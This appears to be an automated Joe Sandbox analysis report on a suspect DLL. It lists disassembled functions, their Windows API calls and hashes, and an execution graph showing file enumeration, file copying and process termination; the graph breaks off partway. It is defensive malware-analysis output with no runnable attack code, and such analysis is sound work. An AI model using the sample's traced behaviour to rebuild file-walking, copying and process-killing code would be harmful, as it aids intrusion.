                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: ErrorLastValue___vcrt_
                • String ID:
                • API String ID: 3852720340-0
                • Opcode ID: 6b2e47368bc15be041006d23d70be17a24eb338fc9f8a7e1992b299c989ded0c
                • Instruction ID: 4d6169c79c67a7150b3ac50f73979c9d820915f1afde0924998c2280c9c9ca51
                • Opcode Fuzzy Hash: 6b2e47368bc15be041006d23d70be17a24eb338fc9f8a7e1992b299c989ded0c
                • Instruction Fuzzy Hash: 5E01D476D2D7116EAB102AB66C866162B5DEB93B7C7300279E510515ECEF7DC801C285
                Function 6B933DF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                Download Yara Rule
                Strings
                • C:\Windows\system32\loaddll32.exe, xrefs: 6B933E14
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID: C:\Windows\system32\loaddll32.exe
                • API String ID: 0-1062229814
                • Opcode ID: b09f75953ad386e545090deb20d37ee963bc54d663e6990d6ecc9f2115e3ff55
                • Instruction ID: fda453353d074f2fef76234507ebb48e8d74cdd9fff0ce34d1e21fd9f5c694eb
                • Opcode Fuzzy Hash: b09f75953ad386e545090deb20d37ee963bc54d663e6990d6ecc9f2115e3ff55
                • Instruction Fuzzy Hash: 0E219031A8C225AFDB31DF75DC8095B7BADAF117687004564FD2897250EB38EC50C7A0
                Function 6B92E429 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,FB32F76A,6B92C75A,?,00000000,6B93C710,000000FF,?,6B92E3C3,B586E81C,?,6B92E397,?), ref: 6B92E45E
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6B92E470
                • FreeLibrary.KERNEL32(00000000,?,00000000,6B93C710,000000FF,?,6B92E3C3,B586E81C,?,6B92E397,?), ref: 6B92E492
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: 005a5bb057b3087d08290b914d4d80b3ac7a5c11022cde4666a6c734d70ecacc
                • Instruction ID: 93150c006080d9b96ee65540aa8132dfac739574b264d8c55f8b58510a51526d
                • Opcode Fuzzy Hash: 005a5bb057b3087d08290b914d4d80b3ac7a5c11022cde4666a6c734d70ecacc
                • Instruction Fuzzy Hash: 3B016235968A29BBDF119B51CC48BAE7BB8FF45B51F004665E821A2390DB78D900CA90
                Function 6B938CF4 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                Download Yara Rule
                APIs
                • __alloca_probe_16.LIBCMT ref: 6B938D79
                • __alloca_probe_16.LIBCMT ref: 6B938E42
                • __freea.LIBCMT ref: 6B938EA9
                  • Part of subcall function 6B93047E: RtlAllocateHeap.KERNEL32(00000000,6B934371,7D32887D,?,6B934371,00000220,?,6B921775,7D32887D), ref: 6B9304B0
                • __freea.LIBCMT ref: 6B938EBC
                • __freea.LIBCMT ref: 6B938EC9
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: __freea$__alloca_probe_16$AllocateHeap
                • String ID:
                • API String ID: 1423051803-0
                • Opcode ID: e5a2498ca219f85b277288760b1860d736c642fae45eca197516eb4dbc971e91
                • Instruction ID: bb5687ed8dd453546ba5c064f4059def76ce5d8c8d347d79de7a93afc8a81616
                • Opcode Fuzzy Hash: e5a2498ca219f85b277288760b1860d736c642fae45eca197516eb4dbc971e91
                • Instruction Fuzzy Hash: 3B51F372A00226AFEB299F64CCC5EAB3BBDEF94718B110569FD14D6250EB38DC508760
                Function 6B9278B2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6B927863,00000000,?,00000001,?,?,?,6B927952,00000001,FlsFree,6B93DCE0,FlsFree), ref: 6B9278BF
                • GetLastError.KERNEL32(?,6B927863,00000000,?,00000001,?,?,?,6B927952,00000001,FlsFree,6B93DCE0,FlsFree,00000000,?,6B926878), ref: 6B9278C9
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6B9278F1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: LibraryLoad$ErrorLast
                • String ID: api-ms-
                • API String ID: 3177248105-2084034818
                • Opcode ID: aad5e9a581f097f0104f3c62fe998473158f2a9d2a84a25f880a9eb89a918e8c
                • Instruction ID: b2ef149497753960300170237b5ab8f9198c92de32f7bb3b8371807c071ae1d1
                • Opcode Fuzzy Hash: aad5e9a581f097f0104f3c62fe998473158f2a9d2a84a25f880a9eb89a918e8c
                • Instruction Fuzzy Hash: 25E04F30A98309B7EF112F71DD46B493F69AF02B44F504470F90DF9195EB79D861C985
                Function 6B9325E6 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetConsoleOutputCP.KERNEL32(FB32F76A,00000000,00000000,?), ref: 6B932649
                  • Part of subcall function 6B934945: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6B938E9F,?,00000000,-00000008), ref: 6B9349A6
                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6B93289B
                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6B9328E1
                • GetLastError.KERNEL32 ref: 6B932984
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                • String ID:
                • API String ID: 2112829910-0
                • Opcode ID: 1f9315c600466f72c7746dc853051df72928a2955d50ec746d3b6d6b79931618
                • Instruction ID: 47e99add74c7a9bebca7aa54ae920c7b85d95ed588e90b813f86614056dd3e9c
                • Opcode Fuzzy Hash: 1f9315c600466f72c7746dc853051df72928a2955d50ec746d3b6d6b79931618
                • Instruction Fuzzy Hash: D0D18A75D04269AFCB05CFA8C990AEDBBB9FF09314F24416AE425EB351E634E941CB90
                Function 6B926883 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: AdjustPointer
                • String ID:
                • API String ID: 1740715915-0
                • Opcode ID: 782db5b2eb21bf65be25ad7246cb58a5a8e24fc9746911b45e708c0af9fee007
                • Instruction ID: d69143cf712d773978987428d441a5f490b7318c3b0a2b5b469c7e3991dc8116
                • Opcode Fuzzy Hash: 782db5b2eb21bf65be25ad7246cb58a5a8e24fc9746911b45e708c0af9fee007
                • Instruction Fuzzy Hash: D251157AD25602EFEB188F65C442B6A73B8FF51718F10416DE85147A99EB39E840CB90
                Function 6B933694 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 6B934945: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6B938E9F,?,00000000,-00000008), ref: 6B9349A6
                • GetLastError.KERNEL32 ref: 6B9336F8
                • __dosmaperr.LIBCMT ref: 6B9336FF
                • GetLastError.KERNEL32(?,?,?,?), ref: 6B933739
                • __dosmaperr.LIBCMT ref: 6B933740
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                • String ID:
                • API String ID: 1913693674-0
                • Opcode ID: d721eb1561ac68d40d3e969f71b4eac05a28fe267b63ac8149127c80e2c25ecc
                • Instruction ID: 3f386d64c9326600096316c7d369e1861d961667d6eb4cb77a56dc2c90bdc72a
                • Opcode Fuzzy Hash: d721eb1561ac68d40d3e969f71b4eac05a28fe267b63ac8149127c80e2c25ecc
                • Instruction Fuzzy Hash: 8621C27168C225AFD7309F76C88195BB7BDEF0176C7008558ED2A97660E738EC418B90
                Function 6B9349E8 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                Download Yara Rule
                APIs
                • GetEnvironmentStringsW.KERNEL32 ref: 6B9349F0
                  • Part of subcall function 6B934945: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6B938E9F,?,00000000,-00000008), ref: 6B9349A6
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6B934A28
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6B934A48
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                • String ID:
                • API String ID: 158306478-0
                • Opcode ID: ebafa3aa9de179e2c063b82ca69362ac408cc86dd4d4602a067ea5de0a7d218d
                • Instruction ID: e44686522afb4796f0e219440eeec1c0f850a0a81e1c8b75e2baf6af0378b2ca
                • Opcode Fuzzy Hash: ebafa3aa9de179e2c063b82ca69362ac408cc86dd4d4602a067ea5de0a7d218d
                • Instruction Fuzzy Hash: DC11D6B29055357F6B6197F69CCDD6F2EACCE96AAC3020124F505D1301FB2ACE0189B6
                Function 6B939F4D Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • WriteConsoleW.KERNEL32(00000000,00000000,6B92D16B,00000000,00000000,?,6B9385E1,00000000,00000001,?,?,?,6B9329D8,?,00000000,00000000), ref: 6B939F64
                • GetLastError.KERNEL32(?,6B9385E1,00000000,00000001,?,?,?,6B9329D8,?,00000000,00000000,?,?,?,6B932FB2,00000000), ref: 6B939F70
                  • Part of subcall function 6B939F36: CloseHandle.KERNEL32(FFFFFFFE,6B939F80,?,6B9385E1,00000000,00000001,?,?,?,6B9329D8,?,00000000,00000000,?,?), ref: 6B939F46
                • ___initconout.LIBCMT ref: 6B939F80
                  • Part of subcall function 6B939EF8: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6B939F27,6B9385CE,?,?,6B9329D8,?,00000000,00000000,?), ref: 6B939F0B
                • WriteConsoleW.KERNEL32(00000000,00000000,6B92D16B,00000000,?,6B9385E1,00000000,00000001,?,?,?,6B9329D8,?,00000000,00000000,?), ref: 6B939F95
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                • String ID:
                • API String ID: 2744216297-0
                • Opcode ID: 0c4de394c03ae4b405f4ec3e0fcd20e9010cf2465c37f058de9966e8af33cf99
                • Instruction ID: 4b911e8d7e92d117fbcf38956c20f8a0c1fc592f80aada0b1db5d02d2194119f
                • Opcode Fuzzy Hash: 0c4de394c03ae4b405f4ec3e0fcd20e9010cf2465c37f058de9966e8af33cf99
                • Instruction Fuzzy Hash: F0F0A237545129BBCF222FE5CC05A893F66EF0A765B154460FA1995121CA36CC20DB91
                Function 6B926E7F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • RtlEncodePointer.KERNEL32(00000000,?), ref: 6B926EA4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: EncodePointer
                • String ID: MOC$RCC
                • API String ID: 2118026453-2084237596
                • Opcode ID: 287be66390cd92bc696adaad56ae708c88829332aa40badfd4022e1fea83bf6b
                • Instruction ID: be15016ad01f63012425d1069b906675305003b6937e9b97a0cfcb0226eb07bc
                • Opcode Fuzzy Hash: 287be66390cd92bc696adaad56ae708c88829332aa40badfd4022e1fea83bf6b
                • Instruction Fuzzy Hash: ED414C71D10209AFDF05CFA4CC81AEE7BB9FF49308F248099F9186A218D339E961DB51

                Execution Graph

                Execution Coverage:2.7%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:0%
                Total number of Nodes:2000
                Total number of Limit Nodes:10
                execution_graph 13761 6f9e1c1a 13762 6f9e1c21 13761->13762 13763 6f9e1fbf 13762->13763 13773 6f9e1c2b 13762->13773 14180 6f9e32d8 13763->14180 13765 6f9e1c47 13766 6f9e1fd2 13767 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13766->13767 13768 6f9e1fe1 13767->13768 14183 6f9e4ad5 13768->14183 13770 6f9e1fa5 FindNextFileW 13770->13765 13770->13773 13772 6f9e1ffc 13773->13765 13773->13770 13780 6f9e1d10 __DllMainCRTStartup@12 _strlen 13773->13780 13796 6f9e1075 13773->13796 13799 6f9e1b85 13773->13799 13776 6f9e1075 __DllMainCRTStartup@12 43 API calls 13777 6f9e1f5e TerminateProcess CloseHandle CloseHandle 13776->13777 14137 6f9e2004 13777->14137 13780->13776 13781 6f9e1075 __DllMainCRTStartup@12 43 API calls 13780->13781 13837 6f9e1135 13780->13837 13840 6f9ed5ab 13780->13840 13781->13780 13787 6f9e32d8 39 API calls __DllMainCRTStartup@12 13792 6f9e1db2 13787->13792 13789 6f9e3389 __DllMainCRTStartup@12 40 API calls 13789->13792 13790 6f9e33f1 40 API calls __DllMainCRTStartup@12 13790->13792 13792->13787 13792->13789 13792->13790 13794 6f9e1075 __DllMainCRTStartup@12 43 API calls 13792->13794 13847 6f9e3854 13792->13847 13850 6f9e32f1 13792->13850 13854 6f9e32c2 13792->13854 13857 6f9e16ba 13792->13857 13861 6f9e2430 CoInitialize 76CCE550 13792->13861 13795 6f9e1e9a CopyFileW TerminateProcess CloseHandle CloseHandle 13794->13795 13795->13773 14190 6f9e1035 13796->14190 13800 6f9e1bca __DllMainCRTStartup@12 13799->13800 13801 6f9e1075 __DllMainCRTStartup@12 43 API calls 13800->13801 13802 6f9e1bfd FindFirstFileW 13801->13802 13803 6f9e1c21 13802->13803 13804 6f9e1fbf 13803->13804 13814 6f9e1c2b 13803->13814 13805 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13804->13805 13807 6f9e1fd2 13805->13807 13806 6f9e1c47 13806->13773 13808 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13807->13808 13809 6f9e1fe1 13808->13809 13810 6f9e4ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 13809->13810 13813 6f9e1ffc 13810->13813 13811 6f9e1fa5 FindNextFileW 13811->13806 13811->13814 13812 6f9e1075 __DllMainCRTStartup@12 43 API calls 13812->13814 13813->13773 13814->13806 13814->13811 13814->13812 13815 6f9e1b85 __DllMainCRTStartup@12 110 API calls 13814->13815 13821 6f9e1d10 __DllMainCRTStartup@12 _strlen 13814->13821 13815->13814 13816 6f9e1135 __DllMainCRTStartup@12 44 API calls 13816->13821 13817 6f9e1075 __DllMainCRTStartup@12 43 API calls 13818 6f9e1f5e TerminateProcess CloseHandle CloseHandle 13817->13818 13819 6f9e2004 __DllMainCRTStartup@12 81 API calls 13818->13819 13820 6f9e1fa3 13819->13820 13820->13811 13821->13816 13821->13817 13822 6f9e1075 __DllMainCRTStartup@12 43 API calls 13821->13822 13823 6f9ed5ab ___std_exception_destroy 14 API calls 13821->13823 13822->13821 13824 6f9e1d89 ExpandEnvironmentStringsW 13823->13824 13825 6f9e3389 __DllMainCRTStartup@12 40 API calls 13824->13825 13834 6f9e1db2 13825->13834 13826 6f9e3854 __DllMainCRTStartup@12 40 API calls 13826->13834 13827 6f9e32f1 __DllMainCRTStartup@12 39 API calls 13827->13834 13828 6f9e32d8 39 API calls __DllMainCRTStartup@12 13828->13834 13829 6f9e32c2 __DllMainCRTStartup@12 40 API calls 13829->13834 13830 6f9e3389 __DllMainCRTStartup@12 40 API calls 13830->13834 13831 6f9e33f1 40 API calls __DllMainCRTStartup@12 13831->13834 13832 6f9e16ba __DllMainCRTStartup@12 39 API calls 13832->13834 13833 6f9e2430 __DllMainCRTStartup@12 96 API calls 13833->13834 13834->13826 13834->13827 13834->13828 13834->13829 13834->13830 13834->13831 13834->13832 13834->13833 13835 6f9e1075 __DllMainCRTStartup@12 43 API calls 13834->13835 13836 6f9e1e9a CopyFileW TerminateProcess CloseHandle CloseHandle 13835->13836 13836->13814 14721 6f9e10f5 13837->14721 13841 6f9f0444 ___free_lconv_mon 14 API calls 13840->13841 13842 6f9e1d89 ExpandEnvironmentStringsW 13841->13842 13843 6f9e3389 13842->13843 13844 6f9e33bb __DllMainCRTStartup@12 13843->13844 14897 6f9e38b4 13844->14897 15009 6f9e3cbc 13847->15009 13849 6f9e3869 __DllMainCRTStartup@12 13849->13792 13852 6f9e3302 __DllMainCRTStartup@12 13850->13852 13851 6f9e3308 __DllMainCRTStartup@12 13851->13792 13852->13851 15060 6f9e34ca 13852->15060 15064 6f9e329b 13854->15064 13858 6f9e16ca __DllMainCRTStartup@12 13857->13858 13859 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13858->13859 13860 6f9e171a 13859->13860 13860->13792 13862 6f9e249a 13861->13862 13863 6f9e24eb 13861->13863 15085 6f9e10c5 13862->15085 15089 6f9e33f1 13863->15089 13869 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13871 6f9e24c5 13869->13871 13873 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13871->13873 13875 6f9e24d1 13873->13875 13874 6f9e2519 15101 6f9e1654 VariantInit 13874->15101 13877 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13875->13877 13913 6f9e24e0 13877->13913 13878 6f9e253e 15102 6f9e1654 VariantInit 13878->15102 13880 6f9e2563 15103 6f9e1654 VariantInit 13880->15103 13881 6f9e4ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 13883 6f9e325d 13881->13883 13883->13792 13884 6f9e2588 15104 6f9e16a8 VariantClear 13884->15104 13886 6f9e25fb 15105 6f9e16a8 VariantClear 13886->15105 13888 6f9e260a 15106 6f9e16a8 VariantClear 13888->15106 13890 6f9e2619 15107 6f9e16a8 VariantClear 13890->15107 13892 6f9e2628 13893 6f9e262e 13892->13893 13894 6f9e2690 13892->13894 13896 6f9e10c5 __DllMainCRTStartup@12 70 API calls 13893->13896 15108 6f9e1456 13894->15108 13897 6f9e263b 76C9D120 13896->13897 13899 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13897->13899 13901 6f9e2661 13899->13901 13900 6f9e26a1 __DllMainCRTStartup@12 15113 6f9e14e7 13900->15113 13903 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13901->13903 13905 6f9e266d 13903->13905 13908 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13905->13908 13906 6f9e273d 13915 6f9e27c8 13906->13915 13916 6f9e2766 13906->13916 13907 6f9e26db 13909 6f9e10c5 __DllMainCRTStartup@12 70 API calls 13907->13909 13910 6f9e2679 13908->13910 13911 6f9e26e8 76C9D120 13909->13911 13912 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13910->13912 13917 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13911->13917 13912->13913 13913->13881 13923 6f9e27e4 13915->13923 13924 6f9e2851 13915->13924 13919 6f9e10c5 __DllMainCRTStartup@12 70 API calls 13916->13919 13918 6f9e270e 13917->13918 13920 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13918->13920 13921 6f9e2773 76C9D120 13919->13921 13922 6f9e271a 13920->13922 13929 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13921->13929 13926 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13922->13926 13928 6f9e10c5 __DllMainCRTStartup@12 70 API calls 13923->13928 13927 6f9e1456 __DllMainCRTStartup@12 4 API calls 13924->13927 13930 6f9e2726 13926->13930 13936 6f9e285e __DllMainCRTStartup@12 13927->13936 13931 6f9e27f1 76C9D120 13928->13931 13932 6f9e2799 13929->13932 13933 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13930->13933 13940 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13931->13940 13934 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13932->13934 13933->13913 13935 6f9e27a5 13934->13935 13938 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13935->13938 13939 6f9e14e7 __DllMainCRTStartup@12 SysFreeString 13936->13939 13941 6f9e27b1 13938->13941 13942 6f9e288e 13939->13942 13943 6f9e2822 13940->13943 13944 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13941->13944 13947 6f9e289f 13942->13947 13948 6f9e290c 13942->13948 13945 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13943->13945 13944->13913 13946 6f9e282e 13945->13946 13949 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13946->13949 13950 6f9e10c5 __DllMainCRTStartup@12 70 API calls 13947->13950 13954 6f9e2928 13948->13954 13960 6f9e2995 13948->13960 13951 6f9e283a 13949->13951 13952 6f9e28ac 76C9D120 13950->13952 13953 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13951->13953 13958 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13952->13958 13953->13913 13955 6f9e10c5 __DllMainCRTStartup@12 70 API calls 13954->13955 13956 6f9e2935 76C9D120 13955->13956 13964 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13956->13964 13959 6f9e28dd 13958->13959 13962 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13959->13962 13967 6f9e29d6 13960->13967 13968 6f9e2a43 13960->13968 13963 6f9e28e9 13962->13963 13966 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13963->13966 13965 6f9e2966 13964->13965 13969 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13965->13969 13970 6f9e28f5 13966->13970 13971 6f9e10c5 __DllMainCRTStartup@12 70 API calls 13967->13971 13976 6f9e2a5f 13968->13976 13977 6f9e2acc 13968->13977 13972 6f9e2972 13969->13972 13973 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13970->13973 13974 6f9e29e3 76C9D120 13971->13974 13975 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13972->13975 13973->13913 13983 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13974->13983 13978 6f9e297e 13975->13978 13979 6f9e10c5 __DllMainCRTStartup@12 70 API calls 13976->13979 13984 6f9e2af5 13977->13984 13985 6f9e2b62 13977->13985 13980 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13978->13980 13981 6f9e2a6c 76C9D120 13979->13981 13980->13913 13991 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13981->13991 13986 6f9e2a14 13983->13986 13987 6f9e10c5 __DllMainCRTStartup@12 70 API calls 13984->13987 13997 6f9e2b8d 13985->13997 13998 6f9e2bfa 13985->13998 13989 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13986->13989 13990 6f9e2b02 76C9D120 13987->13990 13992 6f9e2a20 13989->13992 14006 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13990->14006 13993 6f9e2a9d 13991->13993 13994 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13992->13994 13995 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13993->13995 13996 6f9e2a2c 13994->13996 13999 6f9e2aa9 13995->13999 14002 